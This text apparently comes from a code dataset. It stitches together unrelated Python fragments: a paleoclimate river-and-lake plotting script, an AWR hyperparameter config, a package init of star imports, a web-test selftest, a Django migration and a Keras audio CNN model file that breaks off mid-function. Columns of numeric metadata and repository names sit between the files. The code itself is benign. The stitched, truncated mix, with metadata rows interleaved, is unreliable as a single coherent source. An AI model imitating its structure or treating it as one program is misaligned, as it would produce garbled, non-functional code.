    """Plot a single snapshot map of rivers and lakes for one GLAC1D
    timeslice, combining offline river/lake model output with the matching
    land-sea mask, basin catchment numbers and glacier mask.

    Fix: the *_fieldname variables passed to TwoColourRiverAndLakePlotHelper
    were referenced without ever being defined in this scope, so this method
    always raised NameError.  They are now defined explicitly below.  The
    unused local ``timeinslice`` has also been removed.
    """
    timeslice = "1400"
    timeslice_creation_date_time = "20190925_225029"
    river_flow_filename = "/Users/thomasriddick/Documents/data/temp/transient_sim_1/river_model_results_3650.nc"
    lsmask_filename = os.path.join(self.ls_masks_data_directory, 'generated',
                                   "ls_mask_prepare_basins_from_glac1D_"
                                   + timeslice_creation_date_time + "_"
                                   + timeslice + "_orig.nc")
    basin_catchment_num_filename = os.path.join(self.basin_catchment_nums_directory,
                                                "basin_catchment_numbers_prepare_basins"
                                                "_from_glac1D_" + timeslice_creation_date_time +
                                                "_" + timeslice + ".nc")
    lake_data_filename = "/Users/thomasriddick/Documents/data/temp/transient_sim_1/lake_model_results_3650.nc"
    glacier_filename = os.path.join(self.glacier_data_directory,
                                    "GLAC1D_ICEM_10min_ts" + timeslice + ".nc")
    # NetCDF variable names.  Values follow the conventions used by
    # LakeAndRiverMaps for the same kinds of file -- TODO confirm against
    # the actual offline model output.
    river_flow_fieldname = "friv"
    lsmask_fieldname = "slm"
    basin_catchment_num_fieldname = "lake_number"
    lake_data_fieldname = "diagnostic_lake_vol"
    glacier_fieldname = "glac"
    self.TwoColourRiverAndLakePlotHelper(river_flow_filename,
                                         lsmask_filename,
                                         basin_catchment_num_filename,
                                         lake_data_filename,
                                         glacier_filename,
                                         river_flow_fieldname,
                                         lsmask_fieldname,
                                         basin_catchment_num_fieldname,
                                         lake_data_fieldname,
                                         glacier_fieldname,
                                         minflowcutoff=500000000.0,
                                         lake_grid_type='LatLong10min',
                                         river_grid_type='HD')
def LakeAndRiverMaps(self):
    """Animate rivers, lakes and potential lakes through the deglaciation,
    driving TwoColourRiverAndLakeAnimationHelper with the run-1 transient
    lake experiment output (zoomed onto a North American section)."""
    # All inputs live in the same transient-run directory; only the file
    # stems differ.  DATETIME placeholders are substituted per timestep by
    # the animation helper.
    run_dir = "/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
    river_flow_file_basename = run_dir + "pmt0531_Tom_lake_16k_DATETIME01.01_hd_higres_ym.nc"
    lsmask_file_basename = run_dir + "10min_slm_DATETIME.nc"
    basin_catchment_num_file_basename = run_dir + "lake_numbers_DATETIME.nc"
    lake_data_file_basename = run_dir + "pmt0531_Tom_lake_16k_DATETIME01.01_diagnostic_lake_volumes.nc"
    glacier_file_basename = run_dir + "10min_glac_DATETIMEk.nc"
    rdirs_file_basename = run_dir + "hdpara_DATETIMEk.nc"
    catchment_nums_file_basename = run_dir + "connected_catchments_DATETIME.nc"
    # NetCDF variable names within the files above.
    river_flow_fieldname = "friv"
    lsmask_fieldname = "slm"
    basin_catchment_num_fieldname = "lake_number"
    lake_data_fieldname = "diagnostic_lake_vol"
    glacier_fieldname = "glac"
    rdirs_fieldname = "FDIR"
    catchment_nums_fieldname = "catchments"
    self.TwoColourRiverAndLakeAnimationHelper(
        river_flow_file_basename,
        lsmask_file_basename,
        basin_catchment_num_file_basename,
        lake_data_file_basename,
        glacier_file_basename,
        river_flow_fieldname,
        lsmask_fieldname,
        basin_catchment_num_fieldname,
        lake_data_fieldname,
        glacier_fieldname,
        catchment_nums_file_basename=catchment_nums_file_basename,
        catchment_nums_fieldname=catchment_nums_fieldname,
        rdirs_file_basename=rdirs_file_basename,
        rdirs_fieldname=rdirs_fieldname,
        minflowcutoff=1000.0,
        zoomed=True,
        zoom_section_bounds={"min_lat": 50,
                             "max_lat": 500,
                             "min_lon": 100,
                             "max_lon": 800})
def main():
    """Top level function; define some overarching options and which plots to create.

    The commented-out calls below form a menu of all available plot
    routines; uncomment the ones wanted for a given run.  ``save`` is only
    consumed by the (currently commented) plot-class constructors; ``show``
    controls the final plt.show().
    """
    save = False
    show = True
    #hd_parameter_plots = HDparameterPlots(save=save)
    #hd_parameter_plots.flow_parameter_distribution_for_non_lake_cells_for_current_HD_model()
    #hd_parameter_plots.flow_parameter_distribution_current_HD_model_for_current_HD_model_reprocessed_without_lakes_and_wetlands()
    #hd_parameter_plots.flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs()
    #hd_parameter_plots.flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_no_tuning()
    #ice5g_comparison_plots = Ice5GComparisonPlots(save=save)
    #ice5g_comparison_plots.plotLine()
    #ice5g_comparison_plots.plotFilled()
    #ice5g_comparison_plots.plotCombined()
    #ice5g_comparison_plots.plotCombinedIncludingOceanFloors()
    #flowmapplot = FlowMapPlots(save)
    #flowmapplot.FourFlowMapSectionsFromDeglaciation()
    #flowmapplot.Etopo1FlowMap()
    #flowmapplot.ICE5G_data_all_points_0k()
    #flowmapplot.ICE5G_data_all_points_0k_no_sink_filling()
    #flowmapplot.ICE5G_data_all_points_0k_alg4_two_colour()
    #flowmapplot.ICE5G_data_all_points_21k_alg4_two_colour()
    #flowmapplot.Etopo1FlowMap_two_colour()
    #flowmapplot.Etopo1FlowMap_two_colour_directly_upscaled_fields()
    #flowmapplot.Corrected_HD_Rdirs_FlowMap_two_colour()
    #flowmapplot.ICE5G_data_ALG4_true_sinks_21k_And_ICE5G_data_ALG4_true_sinks_0k_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_sinkless_0k_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_no_true_sinks_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Corrected_HD_Rdirs_And_ICE5G_HD_as_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison()
    #flowmapplot.Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplot.Ten_Minute_Data_from_Virna_data_ALG4_corr_orog_downscaled_lsmask_no_sinks_21k_vs_0k_FlowMap_comparison()
    #flowmapplot.Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment = FlowMapPlotsWithCatchments(save)
    #flowmapplotwithcatchment.Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment.compare_present_day_and_lgm_river_directions_with_catchments_virna_data_plus_tarasov_style_orog_corrs_for_both()
    #flowmapplotwithcatchment.compare_present_day_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs()
    #flowmapplotwithcatchment.compare_lgm_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs()
    #flowmapplotwithcatchment.Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment.upscaled_rdirs_with_and_without_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment.\
    #upscaled_rdirs_with_and_without_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment.\
    #Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment.\
    #Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_glcc_olson_lsmask_0k_FlowMap_comparison()
    #flowmapplotwithcatchment.compare_present_day_and_lgm_river_directions_with_catchments_ICE5G_plus_tarasov_style_orog_corrs_for_both()
    #flowmapplotwithcatchment.compare_present_day_and_lgm_river_directions_with_catchments_ICE6G_plus_tarasov_style_orog_corrs_for_both()
    #flowmapplotwithcatchment.compare_ICE5G_and_ICE6G_with_catchments_tarasov_style_orog_corrs_for_both()
    #outflowplots = OutflowPlots(save)
    #outflowplots.Compare_Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_true_sinks_all_points_0k()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_sinkless_all_points_0k_directly_upscaled_fields()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_true_sinks_all_points_0k_directly_upscaled_fields()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_all_points_0k_directly_upscaled_fields()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_downscaled_ls_mask_all_points_0k_directly_upscaled_fields()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields()
    #outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_plus_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields()
    #outflowplots.Compare_ICE5G_with_and_without_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields()
    #hd_output_plots = HDOutputPlots()
    #hd_output_plots.check_water_balance_of_1978_for_constant_forcing_of_0_01()
    #hd_output_plots.plot_comparison_using_1990_rainfall_data()
    #hd_output_plots.plot_comparison_using_1990_rainfall_data_adding_back_to_discharge()
    #coupledrunoutputplots = CoupledRunOutputPlots(save=save)
    #coupledrunoutputplots.ice6g_rdirs_lgm_run_discharge_plot()
    #coupledrunoutputplots.extended_present_day_rdirs_lgm_run_discharge_plot()
    #coupledrunoutputplots.ocean_grid_extended_present_day_rdirs_vs_ice6g_rdirs_lgm_run_discharge_plot()
    #coupledrunoutputplots.extended_present_day_rdirs_vs_ice6g_rdirs_lgm_echam()
    #coupledrunoutputplots.extended_present_day_rdirs_vs_ice6g_rdirs_lgm_mpiom_pem()
    # Currently active plot selection.
    lake_plots = LakePlots()
    #lake_plots.plotLakeDepths()
    #lake_plots.LakeAndRiverMap()
    lake_plots.LakeAndRiverMaps()
    if show:
        plt.show()
if __name__ == '__main__':
main()
| 76.46204
| 251
| 0.498706
| 26,455
| 305,160
| 5.216556
| 0.046796
| 0.011565
| 0.018768
| 0.026275
| 0.8552
| 0.810774
| 0.771601
| 0.738399
| 0.702422
| 0.677727
| 0
| 0.045451
| 0.447077
| 305,160
| 3,990
| 252
| 76.481203
| 0.772447
| 0.034654
| 0
| 0.589397
| 1
| 0
| 0.12893
| 0.101547
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024615
| false
| 0.00027
| 0.006221
| 0
| 0.043819
| 0.005139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5cd0b7126dd3c2f26ab59042dd531fb0e16da5f7
| 5,311
|
py
|
Python
|
awr_configs.py
|
JKinx/awr
|
2b801b05ae71559a0612bcb94be957f941c0194b
|
[
"MIT"
] | null | null | null |
awr_configs.py
|
JKinx/awr
|
2b801b05ae71559a0612bcb94be957f941c0194b
|
[
"MIT"
] | null | null | null |
awr_configs.py
|
JKinx/awr
|
2b801b05ae71559a0612bcb94be957f941c0194b
|
[
"MIT"
] | null | null | null |
def _awr_config(**overrides):
    """Return one AWR hyper-parameter dict: the defaults shared by every
    environment, merged with *overrides*.

    The original file repeated the same ~20-key dict eight times, inviting
    drift between environments; only ``actor_stepsize``, the exploration
    term (``action_std`` or ``action_l2_weight``) and occasionally
    ``normalizer_samples`` actually differ.  Each call builds fresh list
    objects so configs never share mutable state.
    """
    config = {
        "actor_net_layers": [128, 64],
        "actor_momentum": 0.9,
        "actor_init_output_scale": 0.01,
        "actor_batch_size": 256,
        "actor_steps": 1000,
        "critic_net_layers": [128, 64],
        "critic_stepsize": 0.01,
        "critic_momentum": 0.9,
        "critic_batch_size": 256,
        "critic_steps": 200,
        "discount": 0.99,
        "samples_per_iter": 2048,
        "replay_buffer_size": 50000,
        "normalizer_samples": 300000,
        "weight_clip": 20,
        "td_lambda": 0.95,
        "temp": 1.0,
    }
    config.update(overrides)
    return config


# Per-environment AWR settings; values identical to the previous literal dicts.
AWR_CONFIGS = {
    "Ant-v2": _awr_config(actor_stepsize=0.00005, action_std=0.2),
    "HalfCheetah-v2": _awr_config(actor_stepsize=0.00005, action_std=0.4),
    "Hopper-v2": _awr_config(actor_stepsize=0.0001, action_std=0.4),
    "Humanoid-v2": _awr_config(actor_stepsize=0.00001, action_std=0.4),
    # LunarLander-v2 is discrete: it uses an action L2 penalty instead of a
    # Gaussian action_std, and fewer normalizer samples.
    "LunarLander-v2": _awr_config(actor_stepsize=0.0005,
                                  action_l2_weight=0.001,
                                  normalizer_samples=100000),
    "LunarLanderContinuous-v2": _awr_config(actor_stepsize=0.0001,
                                            action_std=0.2),
    "Reacher-v2": _awr_config(actor_stepsize=0.0001, action_std=0.2),
    "Walker2d-v2": _awr_config(actor_stepsize=0.000025, action_std=0.4),
}
| 25.411483
| 40
| 0.517228
| 611
| 5,311
| 4.165303
| 0.101473
| 0.056582
| 0.075442
| 0.088016
| 0.953635
| 0.953635
| 0.953635
| 0.953635
| 0.953635
| 0.912377
| 0
| 0.151995
| 0.334777
| 5,311
| 209
| 41
| 25.411483
| 0.568356
| 0
| 0
| 0.825843
| 0
| 0
| 0.417357
| 0.039157
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a3235853a8d38f7ad32b4064e7f709933e1dda3
| 203
|
py
|
Python
|
toyotama/util/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/util/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/util/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | 1
|
2021-07-10T03:52:35.000Z
|
2021-07-10T03:52:35.000Z
|
from toyotama.util.connect import *
from toyotama.util.elf import *
from toyotama.util.integer import *
from toyotama.util.log import *
from toyotama.util.shell import *
from toyotama.util.util import *
| 29
| 35
| 0.793103
| 30
| 203
| 5.366667
| 0.3
| 0.447205
| 0.596273
| 0.68323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118227
| 203
| 6
| 36
| 33.833333
| 0.899441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a7bab13a21dff793d54b61c7f33ba2c4816f0e4
| 617
|
py
|
Python
|
src/sst/selftests/current_url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 4
|
2015-01-21T22:20:50.000Z
|
2017-12-18T11:38:16.000Z
|
src/sst/selftests/current_url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 63
|
2015-01-13T19:32:06.000Z
|
2020-04-22T17:01:03.000Z
|
src/sst/selftests/current_url.py
|
wbdl/sst
|
7a2805391fdd390ecb0f488f8377f58381358c89
|
[
"Apache-2.0"
] | null | null | null |
import sst
import sst.actions

# Self-test for get_current_url()/get_base_url(): after setting a base URL
# and navigating, both accessors must report the expected absolute URLs.
root = 'http://localhost:%s/' % sst.DEVSERVER_PORT
sst.actions.set_base_url(root)

for path, expected_url in (('/', root),
                           ('/begin', root + 'begin')):
    sst.actions.go_to(path)
    # The base URL is unaffected by navigation; the current URL tracks it.
    sst.actions.assert_equal(sst.actions.get_base_url(), root)
    sst.actions.assert_equal(sst.actions.get_current_url(), expected_url)
| 36.294118
| 79
| 0.758509
| 98
| 617
| 4.520408
| 0.183673
| 0.27088
| 0.176072
| 0.191874
| 0.85553
| 0.85553
| 0.85553
| 0.85553
| 0.85553
| 0.85553
| 0
| 0
| 0.06483
| 617
| 16
| 80
| 38.5625
| 0.767764
| 0
| 0
| 0.461538
| 0
| 0
| 0.181524
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8fb79b1423d3c9882dab25f322f72d029195b6bf
| 2,087
|
py
|
Python
|
cs28TeamProject/parasitologyTool/migrations/0041_auto_20220211_1447.py
|
Eg3-git/cs28-parasitology-tool
|
4389208ed19f7e348ca931bff48d43263451f7f0
|
[
"CC0-1.0"
] | null | null | null |
cs28TeamProject/parasitologyTool/migrations/0041_auto_20220211_1447.py
|
Eg3-git/cs28-parasitology-tool
|
4389208ed19f7e348ca931bff48d43263451f7f0
|
[
"CC0-1.0"
] | null | null | null |
cs28TeamProject/parasitologyTool/migrations/0041_auto_20220211_1447.py
|
Eg3-git/cs28-parasitology-tool
|
4389208ed19f7e348ca931bff48d43263451f7f0
|
[
"CC0-1.0"
] | null | null | null |
# Generated by Django 2.2.17 on 2022-02-11 14:47
from django.db import migrations, models
class Migration(migrations.Migration):
# Auto-generated schema migration (Django 2.2.17): adds an integer 'likes'
# counter (default 0) to Post, and pins every model's implicit 'id' primary
# key to an explicit AutoField.  Generated code -- avoid hand-editing the
# operations below.
dependencies = [
('parasitologyTool', '0040_rename_post_comment_research_post'),
]
operations = [
migrations.AddField(
model_name='post',
name='likes',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='article',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='comment',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='parasite',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='post',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='researchfile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='researchimage',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='researchpost',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 35.372881
| 108
| 0.596071
| 211
| 2,087
| 5.71564
| 0.241706
| 0.079602
| 0.165837
| 0.192371
| 0.712272
| 0.712272
| 0.712272
| 0.712272
| 0.712272
| 0.712272
| 0
| 0.014037
| 0.283182
| 2,087
| 58
| 109
| 35.982759
| 0.792112
| 0.022041
| 0
| 0.673077
| 1
| 0
| 0.082884
| 0.018637
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89113e999defa99b0020cf494b95904ba793df5f
| 33,060
|
py
|
Python
|
src/models.py
|
anirbanlahiri2017/Tartarus
|
13d01266511e5d64a77cdb071960cc58ee8c47a0
|
[
"MIT"
] | 104
|
2017-06-30T06:51:54.000Z
|
2022-02-17T08:47:57.000Z
|
src/models.py
|
anirbanlahiri2017/Tartarus
|
13d01266511e5d64a77cdb071960cc58ee8c47a0
|
[
"MIT"
] | 5
|
2017-11-24T04:12:02.000Z
|
2021-06-03T08:20:21.000Z
|
src/models.py
|
anirbanlahiri2017/Tartarus
|
13d01266511e5d64a77cdb071960cc58ee8c47a0
|
[
"MIT"
] | 26
|
2017-07-19T07:19:25.000Z
|
2022-01-02T00:19:04.000Z
|
from keras.layers import Dense, Dropout, Activation, Flatten, Permute, Lambda, Input, merge, BatchNormalization, Embedding, LSTM, Bidirectional, Reshape, GRU, Merge, ELU
from keras.layers import Convolution1D, GlobalMaxPooling1D, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, MaxPooling1D
from keras.regularizers import l2, l1
from keras import regularizers
from keras.models import Sequential, Model
import logging
from keras import backend as K
import keras
import theano.tensor as T
import numpy as np
import pickle
import common
# Default hyper-parameter set for the audio CNN experiments defined below.
# Empty-string values ('fact', 'dataset', 'n_out', ...) are placeholders
# presumably filled in before training -- confirm against the caller.
params_1 = {
# dataset params
'dataset' : {
'fact' : '',
'dim' : 200,
'dataset' : '',
'window' : 15,
'nsamples' : 'all',
'npatches' : 3
},
# training params
'training' : {
'decay' : 1e-6,
'learning_rate' : 0.1,
'momentum' : 0.95,
'n_epochs' : 100,
'n_minibatch' : 32,
'nesterov' : True,
'validation' : 0.1,
'test' : 0.1,
'loss_func' : 'cosine',
'optimizer' : 'adam'
},
# cnn params
# n_filters_k / n_kernel_k / n_pool_k configure conv block k of the models
# below; a block with n_filters_k == 0 is skipped entirely.
'cnn' : {
'dropout_factor' : 0.5,
'n_dense' : 0,
'n_dense_2' : 0,
'n_filters_1' : 1024,
'n_filters_2' : 1024,
'n_filters_3' : 2048,
'n_filters_4' : 2048,
'n_filters_5' : 0,
'n_kernel_1' : (4, 96),
'n_kernel_2' : (4, 1),
'n_kernel_3' : (4, 1),
'n_kernel_4' : (1, 1),
'n_kernel_5' : (1, 1),
'n_out' : '',
'n_pool_1' : (4, 1),
'n_pool_2' : (4, 1),
'n_pool_3' : (1, 1),
'n_pool_4' : (1, 1),
'n_pool_5' : (1, 1),
# input spectrogram size: n_frames time steps x n_mel mel bands
'n_frames' : 322,
'n_mel' : 96,
'architecture' : 2,
'batch_norm' : False,
'dropout' : True
},
'predicting' : {
'trim_coeff' : 0.15
},
'evaluating' : {
'get_map' : False,
'get_p' : True,
'get_knn' : False
}
}
# AUDIO ARCH CNNs
def get_model_1(params):
"""Build the sequential audio CNN: up to five conv+maxpool+dropout blocks
(blocks 3-5 only when their n_filters_k > 0), flattened into optional
dense layers and a final dense output layer.

When params["final_activation"] is 'linear' the output is additionally
L2-normalised, so the model emits unit-length embedding vectors.
NOTE(review): 'final_activation' has no default in params_1 above -- it is
presumably injected by the caller before this is invoked; confirm.
Uses the Keras 1.x API (border_mode=, init=, output_dim=).
"""
model = Sequential()
# Block 1: with the params_1 defaults the (4, 96) kernel spans all 96 mel
# bands, collapsing the frequency axis in the first convolution.
model.add(Convolution2D(params["n_filters_1"], params["n_kernel_1"][0],
params["n_kernel_1"][1],
border_mode='valid',
input_shape=(1, params["n_frames"],
params["n_mel"]),
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Input CNN: %s" % str(model.input_shape))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_1"][0],
params["n_pool_1"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
# Block 2 (always present).
model.add(Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
params["n_kernel_2"][1],
border_mode='valid',
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_2"][0],
params["n_pool_2"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
# Blocks 3-5 are optional; a filter count of zero disables the block.
if params["n_filters_3"] > 0:
model.add(Convolution2D(params["n_filters_3"],
params["n_kernel_3"][0],
params["n_kernel_3"][1],
border_mode='valid',
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_3"][0],
params["n_pool_3"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_4"] > 0:
model.add(Convolution2D(params["n_filters_4"],
params["n_kernel_4"][0],
params["n_kernel_4"][1],
border_mode='valid',
init="uniform"))
model.add(Activation("relu"))
#model.add(BatchNormalization())
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_4"][0],
params["n_pool_4"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_5"] > 0:
model.add(Convolution2D(params["n_filters_5"],
params["n_kernel_5"][0],
params["n_kernel_5"][1],
border_mode='valid',
init="uniform"))
model.add(Activation("relu"))
#model.add(BatchNormalization())
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_5"][0],
params["n_pool_5"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
model.add(Flatten())
logging.debug("Output Flatten: %s" % str(model.output_shape))
#model.add(Dropout(params["dropout_factor"]))
# Optional fully-connected head: two dense+relu+dropout layers of the
# same width when n_dense > 0 (disabled in params_1).
if params["n_dense"] > 0:
model.add(Dense(output_dim=params["n_dense"], init="uniform"))
model.add(Activation("relu"))
model.add(Dropout(params["dropout_factor"]))
logging.debug("Output Dense: %s" % str(model.output_shape))
model.add(Dense(output_dim=params["n_dense"], init="uniform"))
model.add(Activation("relu"))
model.add(Dropout(params["dropout_factor"]))
logging.debug("Output Dense: %s" % str(model.output_shape))
# Output layer sized to the target dimensionality.
model.add(Dense(output_dim=params["n_out"], init="uniform"))
model.add(Activation(params["final_activation"]))
logging.debug("Output CNN: %s" % str(model.output_shape))
if params['final_activation'] == 'linear':
model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
return model
# Audio ARCH with graph api
def get_model_11(params):
"""Functional-API variant of get_model_1: four fixed conv+maxpool+dropout
blocks (no n_filters_k > 0 gating, no BatchNorm option), flattened into a
single linear dense layer whose output is always L2-normalised -- i.e. it
always produces unit-length embeddings.

Uses the Keras 1.x graph API (Model(input=..., output=...)); the
layer.output_shape logging relies on Keras 1.x layer attributes.
"""
inputs = Input(shape=(1, params["n_frames"],
params["n_mel"]), name='input')
# Block 1: convolution over the input spectrogram (activation fused into
# the layer here, unlike the separate Activation layers in get_model_1).
conv1 = Convolution2D(params["n_filters_1"], params["n_kernel_1"][0],
params["n_kernel_1"][1],
border_mode='valid',
activation='relu',
input_shape=(1, params["n_frames"],
params["n_mel"]),
init="uniform")
x = conv1(inputs)
#logging.debug("Input CNN: %s" % str(inputs.output_shape))
logging.debug("Output Conv2D: %s" % str(conv1.output_shape))
pool1 = MaxPooling2D(pool_size=(params["n_pool_1"][0],
params["n_pool_1"][1]))
x = pool1(x)
logging.debug("Output MaxPool2D: %s" % str(pool1.output_shape))
x = Dropout(params["dropout_factor"])(x)
# Block 2.
conv2 = Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
